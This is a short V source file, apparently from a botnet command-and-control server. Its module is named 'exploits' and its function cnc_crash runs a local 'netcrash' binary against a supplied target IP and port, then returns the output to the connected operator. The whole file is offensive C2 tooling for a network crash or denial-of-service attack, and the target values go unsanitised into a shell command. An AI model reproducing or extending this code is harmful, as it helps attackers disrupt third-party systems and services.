module exploits
import os
import net

pub fn cnc_crash(mut conn net.TcpConn, targetIp string, targetPort string, ip string) {
    output := os.execute("./root/c2/commands/netcrash $targetIp $targetPort 1")
    conn.write_string(output.output) or {0}
}